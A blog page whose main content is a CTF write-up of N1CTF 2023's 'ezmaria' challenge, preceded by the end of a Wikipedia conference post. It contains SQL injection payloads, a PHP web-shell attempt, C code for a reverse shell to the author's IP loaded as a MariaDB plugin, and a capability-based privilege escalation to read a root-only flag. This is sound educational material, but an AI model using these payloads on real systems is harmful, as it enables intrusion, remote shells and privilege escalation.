Now think about the average Wikipedia editor. Are they interested in one paragraphs answers? I don't know for sure, but I would posit that they tend to be more interested in the larger nuanced story. Yes other distribution models may threaten our ability to recruit from users using them, but I don't think that is the target audience we would want to focus recruitment on anyways. I suppose time will tell. AI might just be a fad in the end.

Conclusion

I had a great time. It was awesome to see old friends but also meet plenty of new people I did not know. I learned quite a bit, especially about Wikipedia governance. In many ways, it is one of the more surprising wiki conferences I've been too, as it contained quite a bit of content that was new to me. I plan to write a second blog post about my more raw unfiltered thoughts on specific presentations. (Edit: I never did make a second post, and i guess its kind of late enough at this point that i probably won't, so nevermind about that)

Monday, October 23, 2023

CTF Writeup N1CTF 2023: ezmaria

 This weekend I participated in N1CTF. Challenges were quite hard, and other than give-away questions, I only managed to get one: ezmaria. Despite that, I still ended up in 35th place, which I think is a testament to how challenging some of these problems were. Certainly an improvement from 2021 where I came 98th. Maybe next year I'll be able to solve a problem that doesn't have "ez" in the name.



The problem

We are given a website with a clear SQL injection. It takes an id parameter, does a query, and outputs the result.

First things first, lets see what we are dealing with: 0 UNION ALL select 1, version(); reveals that this is 10.5.19-MariaDB+deb11u2. A bit of an old version, but i didn't see any immediately useful CVEs. (MariaDB is a fork of MySQL so the name "mysql" still appears all over the place even though this is MariaDB and not MySQL)

The contest organizers provided a hint: "get shell and run getcap", so presumably the flag is not in the database. Nonetheless, i did poke around information_schema to check what was in the database. There was a fake flag but no real ones.

The text of the website strongly implied that it was written in PHP, so continuing on the trend of ruling out the easy things, I tried the traditional 0 UNION ALL select 1, "<?php passthru( $_REQUEST['c'] ); ?>" INTO OUTFILE "/var/www/html/foo.php";

This gave an error message. It appears that OUTFILE triggered some sort of filter. Trying again with DUMPFILE instead bypasses the filter. However instead MariaDB gives us an error message about file system permissions. No dice. It is interesting though that I got far enough for it to be a filesystem permission error. This implies that our MariaDB user has FILE or SUPER permissions and that secure_file_priv is disabled.

The next obvious step is to try and learn a little bit more about the environment. MariaDB supports a LOAD_FILE to read files. First I tried to read environment variables out of /proc, but that didn't work. The next obvious thing was to fetch the source code of the script generating this page. Since it is implied php, /var/www/html/index.php is a good guess for the path: 0 UNION ALL SELECT load_file( "/var/www/html/index.php" ),1

Index.php


Finally a step forward. This returned the php script in question, which had several interesting things in it.
 
First off 
$servername = "127.0.0.1";
$username = "root";
$password = "123456";
$conn = new mysqli($servername, $username, $password, $dbn);

Always good to know the DB credentials. While not critical, they do become somewhat useful later. Additionally, the fact we are running as the root database user opens up several avenues of attack I wouldn't otherwise have.

// avoid attack
if (preg_match("/(master|change|outfile|slave|start|status|insert|delete|drop|execute|function|return|alter|global|immediate)/is", $_REQUEST["id"])){
    die("你就不能绕一下喵");
}

Good to know what is and isn't being filtered if I need to evade the filter later, although to be honest this didn't really come up when solving the problem.

$result = $conn->multi_query($cmd);

This is really interesting. Normally in PHP when using mysqli, you would use $conn->query(), not ->multi_query(). Multi_query supports stacked queries, which means I am not just limited to UNION ALL-ing things, but can use a semi-colon to add additional full queries including verbs other than SELECT.

The script unfortunately will not output the results or errors of these other stacked queries only the first query, which significantly slowed down solving this problem, but more on that later.

Last of all, is the secret command:
//for n1ctf ezmariadb secret cmd

if ($_REQUEST["secret"] === "lolita_love_you_forever"){
    header("Content-Type: text/plain");
    echo "\\n\\n`ps -ef` result\\n\\n";
    system("ps -ef");
    echo "\\n\\n`ls -l /` result\\n\\n";
    system("ls -l /");
    echo "\\n\\n`ls -l /var/www/html/` result\\n\\n";
    system("ls -l /var/www/html/");
    echo "\\n\\n`find /mysql` result\\n\\n";
    system("find /mysql");
    die("can you get shell?");
}


While that looks promising, lets do it!

The secret command

For space, I am going to omit some of the less important parts:

`ps -ef` result

UID          PID    PPID  C STIME TTY          TIME CMD
[..]
root          15      13  0 14:06 ?        00:00:00 su mysql -c mariadbd --skip-grant-tables --secure-file-priv='' --datadir=/mysql/data --plugin_dir=/mysql/plugin --user=mysql
mysql         20      15  0 14:06 ?        00:00:00 mariadbd --skip-grant-tables --secure-file-priv= --datadir=/mysql/data --plugin_dir=/mysql/plugin --user=mysql
[..]


`ls -l /` result

total 96
[..]
-rw-------   1 root  root    32 Oct 22 14:06 flag
-rwxr-xr-x   1 root  root    84 Sep 18 06:10 flag.sh
drwxr-xr-x   1 mysql mysql 4096 Oct 17 22:35 mysql
-rwx------   1 root  root   160 Oct 17 22:35 mysql.sh
[..]


`find /mysql` result

/mysql
/mysql/plugin
/mysql/data
/mysql/data/ibtmp1
[..]
can you get shell?


So some interesting things here.
 
Presumably the only-root-readable flag file is our target. MariaDB is running as "mysql", thus would not be able to read it. However a hint was given out to run getcap, so presumably capabilities are in play somehow. However this output does not give us any indication as to how, so I guess we'll have to figure that out later.

I was immediately curious about the flag.sh file, but it turns out to be just a script that creates the flag file and removes the flag from the environment variables.
 
An interesting thing to note here, is that mariadbd is run with some non-standard options --skip-grant-tables --secure-file-priv= --datadir=/mysql/data --plugin_dir=/mysql/plugin. We already discovered that secure-file-priv had been disabled, but it seems especially interesting when combined with setting the plugin_dir to a non-standard location that appears to be writable by mariadb. --skip-grant-tables means that MariaDB does not get user information from the internal "mysql" database. Normally in MariaDB there is a special database named mysql that stores internal information including what rights various users have - this option says not to use that database for user rights. The impact of this will become more clear later.
 
We are asked "can you get shell?", and it seems like that is a natural place to focus next.

MariaDB plugins

Setting the plugin directory to a non-standard writable directory is a pretty big hint that plugins are in play, so how do plugins work in MariaDB?

There's a variety of plugin types in MariaDB that do different things. They can add new authentication methods, new SQL functions, change the way the server operates, etc. There's also a concept of server-side vs client-side plugins. A client-side plugin is used with custom authentication schemes from programs like the mariadb command line client. Generally plugins are dynamically loaded compiled shared object (.so or .dll) files

For server side plugins, they can be enabled in config files, or dynamically via the INSTALL PLUGIN plugin_name SONAME "libwhatever.so"; SQL command. MariaDB then uses dlopen() to load the specified so file.

With all that in mind, a plan forms for how to get shell. It is still unclear where to go from there, since our shell will be running as the mysql user which won't be able to read the flag. The hope is that once we have a shell we can investigate the server more thoroughly and find some way to escalate privileges. In any case, the plan is: Write a plugin that spawns a reverse shell, upload the plugin via the SQL injection using INTO DUMPFILE, enable the plugin and catch the shell with netcat.

Writing a plugin

MariaDB already comes with a lot of plugins, so instead of writing one from scratch I decided to just modify an existing one.

We can download the sources for the debian version of mariadb at https://salsa.debian.org/mariadb-team/mariadb-10.5.git.

I could implement the needed commands in the plugin initialization function, the way a proper plugin would, but it seemed easier to just add a constructor function. This will get executed as soon as MariaDB calls dlopen(), so even if something is wrong with the plugin and MariaDB refuses to load it - as long as it can be linked in, my code will still run.

With that in mind, I added the following to the middle of plugin/daemon_example/daemon_example.cc:
 
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
 
__attribute__((constructor))
void shell(void){
  if (!fork() ) {
    int port = 8080;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("167.172.208.75");

    connect(sockt, (struct sockaddr *) &revsockaddr,
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, {NULL} );
  }     
}


The __attribute__((constructor)) tells gcc that this function should run immediately upon dlopen(). It then opens a connection to 167.172.208.75 (my IP address) on port 8080, connecting stdin, stdout, and stderr to the opened socket, and executing /bin/sh thus making a remotely accessible shell. On my own computer I will be running nc -v -l -p 8080 waiting for the connection. Once it connects I will have a shell to the remote server.

I run cmake and make and wait for things to compile. Eventually they do, and we have a nice shiny libdaemon_example.so.
 

Installing the plugin

I convert this to base64, and prepare in a file named data containing: 0 UNION ALL SELECT from_base64( "...libdaemon_example.so as base64" ) INTO DUMPFILE "/mysql/plugin/libdaemon_example.so"; and upload it via curl 'http://urlOfChallenge' --data-urlencode id@data.
 
We can confirm it got there safely, by doing a query: 0 UNION ALL md5(load_file( "/mysql/plugin/libdaemon_example.so" ) ); and verifying the hash matches.

The hashes match, so its time to put this into action. I give the SQL: 0; INSTALL PLUGIN daemon_example SONAME "libdaemon_example.so";

And wait in eager anticipation for netcat to report a connection, but the connection never comes.

----

This is where things would be much simpler if our sql injection actually reported errors from stacked queries. Without that we just have to guess what went wrong, and guess I did. Figuring out why it didn't work took hours.

Initially when testing locally it worked totally fine, using the same version of MariaDB with the same options. I even tried on a different version of MariaDB I had installed, where MariaDB refused to load the plugin due to an API mismatch, but nonetheless my code still ran because it was in a constructor function.
 
After bashing my head against it for several hours,I eventually noticed that my file structure looked different than what it did on the server. On my local computer there was a "mysql" database (In the sense of a collection of tables, not in the sense of the program), where the server only had the ctf and information_schema databases. When compiling mariadb locally, I had run an install script that had created the mysql database automatically.

Getting rid of the mysql database, I was able to reproduce the problem locally, and got a helpful error message. Turns out, INSTALL PLUGIN uses the mysql.plugins table internally and refuses to run if it isn't present. I dug around the MariaDB sources, and found scripts/mysql_system_tables.sql which had a definition for this table.

This also explains why the --skip-grants-table option was set. MariaDB will abort if the mysql.global_priv table is not present without this option. Hence the option is needed for MariaDB to even run in this setup.

With that in mind, i gave the following commands to the server to create the missing plugins table:

 0;
 CREATE database mysql;
 USE mysql;
 CREATE TABLE IF NOT EXISTS plugin ( name varchar(64) DEFAULT '' NOT NULL, dl varchar(128) DEFAULT '' NOT NULL, PRIMARY KEY (name) ) engine=Aria transactional=1 CHARACTER SET utf8 COLLATE utf8_general_ci comment='MySQL plugins';

Now with the mysql.plugin existing, lets try this again:

0; INSTALL PLUGIN daemon_example SONAME "libdaemon_example.so";
 
I then look over to my netcat listener:
 
Listening on 0.0.0.0 8080
Connection received on 116.62.19.175 26740
pwd
/mysql/data
 
We have shell!

Exploring the system

Alright, we're in. Now what?

The contest organizers gave a hint saying to run getcap, so that seems like a good place to start:

getcap -r / 2> /dev/null
/usr/bin/mariadb cap_setfcap+ep

Well that is something. Apparently the MariaDB command line client (not the server) has the setfcap capability set.

What are capabilities anyhow?

While I have certainly heard of linux capabilities before, I must admit I wasn't very familiar with them. So what are they?

Capabilities are basically a fine-grained version of "root". Each process (thread technically) has a certain set of capabilities, which grant it rights it wouldn't normally otherwise have.

For example, if you are running a web server that needs to listen on port 80, instead of giving it full root rights, you could give the process CAP_NET_BIND_SERVICE capabilities, which allows it to bind to port 80 even if it is not root. Traditionally you need root to bind to any port below 1024.

There are a variety of capabilities that divide up the traditional things that root gives you, e.g. CAP_CHOWN to change file owners or CAP_KILL to send signals and so.

Sounds simple enough, but the rules on how capabilities are transferred between processes are actually quite complex. Personally I found most of the docs online a bit confusing, so here is my attempt at explaining:
 
Essentially, each running thread has 5 sets of capabilities, and each executable program has 2 sets + 1 special bit in the filesystem. What capabilities a new process will actually have and which ones are turned on is the result of the interplay between all these different sets.

The different capabilities associated with a thread are as follows (You can view the values for a specific running process in /proc/XXX/status):
  • Effective: These are the capabilities that are actually currently used for the thread when doing permission checks. You can think of these as the capabilities that are currently "on".
  • Permitted: These are the capabilities that the thread can give itself. In essence, these are the capabilities that the thread can turn on, but may or may not currently be "on" (effective). If a capability is in this set but not the effective set, it won't be used for permission checks at present but a thread is capable of enabling it for permission checks later on with cap_set_proc().
  • Inheritable: These are the capabilities that can potentially be inherited by new processes after doing execve. However the new process will only get these capabilities if the file being executed has also been marked as inheriting the same capability.
  • Ambient: This is like a super-version of inheritable. These capabilities will always be given to child processes after execve even if the program is not explicitly marked as being able to inherit them. It will inherit them into both its effective set and its permitted set, so they become "on" by default.
  • Bounding: This is more like a max limit. Anything not in this list can be never given out or gained. In a normal system, you probably have all capabilities in this set, but if you wanted to setup a restricted system some capabilities might be removed from here to ensure it is impossible to ever gain them back.
In addition to threads having capabilities, executable files on the file system also can have capabilities. This is somewhat akin to how SUID works (although unlike SUID this is not marked in the output of ls in any way). Files have 2 sets of capabilities and 1 special flag. These can be viewed using getcap:
  • Permitted: These are the capabilities that the executable will get when being executed. The process will get all of these capabilities (except those missing from the bounding set) even if the parent process does not have these capabilities. Its important to remember that the file permitted set is a different concept from the permitted set of a running process.
  • Inheritable: These are the capabilities the executable will get if the running parent process also has them in its inheritable set.
  • Effective flag: This is just a flag not a set of capabilities. This controls how the new process will gain capabilities. If it is off, then the new capabilities will go in the thread's permitted set and won't automatically be enabled until the thread itself enables them by adding to its own effective set. If this flag is on, then the new capabilities for the thread go in the thread's effective set automatically (i.e. they start in an "on" state).
Generally capabilities for files are displayed as capability_name=eip where e, i and p, denote what file set the capability is in (e is a flag so has to be on for all or none of the capabilities).
 
To summarize file system capabilities: "permitted" are the capabilities the process automatically gets when started regardless of parent process, "inherited" are the ones that they can potentially gain from the parent process but generally won't get if the parent process doesn't have them as inheritable, and effective controls if the capabilities are on by default or if the process has to make a syscall before they become turned on.

This is a bit complex, so lets consider an example:

Consider an executable file named foo that has cap_chown in its (filesystem) inherited set and cap_kill in its (filesystem) permitted set.
 
 sudo setcap cap_chown=+i\ cap_kill=+p ./foo
 
This means when we execute it, the foo process will definitely have cap_chown in its permitted set regardless  (As long as it is in the bounding set of the parent process). It might have cap_kill in its permitted set, but only if the parent process had cap_kill in its inheritable set. However its effective set will be empty (assuming no ambient capabilities are in play) until foo calls cap_set_proc(). If instead the e flag was set, then these capabilities would immediately be in the effective set without having to call cap_set_proc. Regardless if the foo process execve's some other child process where the file being executed is not marked as having any capabilities, the child would not inherit any of these capabilities foo has.


I've simplified this somewhat, see capabilities(7) man page for the full details.

MariaDB's capabilities

With that in mind, lets get back the problem at hand.

/usr/bin/mariadb cap_setfcap+ep

So MariaDB client has the setfcap capability. It is marked effective and permitted, which means the process will always get it and have it turned on by default when executed.

What is cap_setfcap? According to the manual, it allows the process to "Set arbitrary capabilities on a file."

Alright, that sounds useful. We want to read /flag despite not having permission to, so we can get mariadb with its CAP_SETFCAP capability to give another executable CAP_DAC_OVERRIDE capability. CAP_DAC_OVERRIDE means ignore file permissions, which would allow us to read any file.

My initial thought was to use the \! operator in the mariadb client, which lets you run shell commands, to run setcap(8). However it quickly became obvious that this wouldn't work. Since these permissions are only in the permitted & effective sets, they are not going to be inherited by the shell. Even if they were in the inheritable set, the shell would also have to have its executable marked as inheriting them in order for them to get inherited. Thus any subshell we make is unprivileged.

We need mariadb to execute our commands inside its process without running execve. The moment we execve we lose these capabilities.

Luckily, we can basically use the same trick as last time. In addition to mariadbd server supporting plugins, mariadb client also supports plugins. These are used for supporting custom authentication methods.
 
In MariaDB users can be authenticated via plugins. These server side authentication plugins can also have a client side requirement. If you try and log in as a user marked as using one of these plugins, the MariaDB client will automatically try and load (dlopen()) the relevant plugin when you try and log in as that user.

I again modified an existing one instead of trying to make my own. I decided to go with the dialog_example plugin from the MariaDB source code.

The server side part of this is from plugin/auth_examples/dialog_examples.c. The only change i made was to switch mysql_declare_plugin(dialog) to maria_declare_plugin(dialog) and set the stability to MariaDB_PLUGIN_MATURITY_STABLE (previously was 0). This was needed for mariadb to load the plugin in the default configuration. For clarity sake, although the name of the file is dialog_examples, the plugin's actual name is "two_questions".
 
After compiling, this generated a dialog_examples.so file which I uploaded to the server in the same fashion as before.

The client side part of the plugin is from libmariadb/plugins/auth/dialog.c. I added the following code:

#include <sys/capability.h>

#define handle_error(msg) \
   do { perror(msg); } while (0)

__attribute__((constructor))
void foo(void) {
        cap_t cap = cap_from_text( "cap_dac_override=epi" );
        if (cap == NULL) handle_error( "cap_from_text" );
        int res = cap_set_file( "/mysql/priv", cap );
        if (res != 0 ) handle_error( "cap_set_file" );
}


I also modified libmariadb/plugins/auth/CMakeLists.txt to add LIBRARIES cap to the REGISTER_PLUGIN directive to ensure it is linked with libcap.

This code esentially says, when the plugin is loaded, change the file capabilities of /mysql/priv to be cap_dac_override=epi (The i is probably unnecessary) thus allowing that program to read all files.

Compiling this made libmariadb/dialog.so which I uploaded to the server in the usual fashion. I also ran cp /bin/cat /mysql/priv to create the target for our plugin's capability modifications.

Setting things up to run the plugin

Now that these pieces are in place, we still have to convince the mariadb client to run our plugin. This comes down to trying to login to a mariadb server that needs the dialog/two_questions authorization method.
 
Normally this would be pretty easy, just run CREATE USER. However, that uses the grant table which is explicitly disabled.
 
At first I thought I was going to need to somehow get rid of this option on the server (Or i suppose just use a server on a different host. I didn't think of that at the time, but it probably would have been simpler). However, it turns out, even if the server starts without the grants table enabled you can enable it after the fact by running FLUSH PRIVILEGES.

Of course, these tables don't even exist, and the normal methods of adding entries (CREATE USER command) won't work until they do. Thus we have to manually create the table ourselves and make appropriate entries.
 
I log in using the mariadb command line client from the shell, as this is a lot easier than the sql-injection, and run the following commands to set this all up:
 
$ mariadb -u root -h 127.0.0.1 -p123456 -n

use mysql;
source /usr/share/mysql/mysql_system_tables.sql; -- install defaults for mysql db

INSTALL PLUGIN two_questions SONAME "dialog_examples.so";

INSERT INTO `global_priv` VALUES ('%','foo','{\"access\":1073741823,\"version_id\":100521,\"plugin\":\"two_questions\",\"authentication_string\":\"*00A51F3F48415C7D4E8908980D443C29C69B60C9\",\"password_last_changed\":1698000149}' );

INSERT INTO `global_priv` VALUES ('%','root','{\"access\":1073741823,\"version_id\":100521,\"plugin\":\"mysql_native_password\",\"authentication_string\":\"**6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9\",\"password_last_changed\":1698000149}' );

FLUSH PRIVILEGES;

 
In summary - I use the -n option to ensure mariadb flushes output since we don't have a pseudo-terminal, output will show up way too late if we don't do this.

I switch to the special mysql database which we created earlier. I already created the plugin table, but now I use SOURCE to create the other defaults for the mysql database. The mysql_system_tables.sql file was already present on the server. Then we insert a root user so we don't lose access, along with a foo user that uses our plugin.

Once we run FLUSH PRIVILEGES the new permissions take affect.

We now exit this and try logging in as foo, being sure to specify the appropriate plugin directory:
 
mysql -u foo2 -h 127.0.0.1 -n --plugin-dir=./plugin

The login doesn't work, but the plugin seems to have been executed. We had previously copied cat to /mysql/priv. If everything worked right, it should now be able to read any file on the system regardless of permissions:

/mysq/priv /flag
n1ctf{9a81f84cc7a3064e34800c35}


Success!

Conclusion

This was a fun problem. It taught me some of the internals of mysql and was a good excuse to finally commit the time to understanding how linux capabilities actually work.

The biggest challenge was figuring out the mysql.plugins table was needed to load a plugin. It probably would have been a lot less frustrating of a problem if error messages from stacked queries were actually output.

Nobody solved this problem until fairly late in the competition, but then about 8 teams did. The ctf organizers did release a hint that capabilities were involved. I wonder if many teams just didn't think to check for that as giving mariadb random capabilities it can't even use is not something that is likely to happen in real life, and capabilities are much less famous than SUID binaries.

Perhaps teams didn't get that far and simply saw from the output of the "secret" website command that some sort of unknown privilege escalation was necessary, figuring it might be some really involved thing and decided to work on other problems instead. In a way I'm kind of surprised that getcap wasn't output from the secret command to give people more of a direct hint - other more obvious things were after all. For that matter, it is kind of weird how ls doesn't mark files with capabilities in any special way like a SUID binary would be. I know its not stored in the traditional file mode, but nonetheless I found it a little surprising how hidden from traditional cli tools it is that capabilities are in play.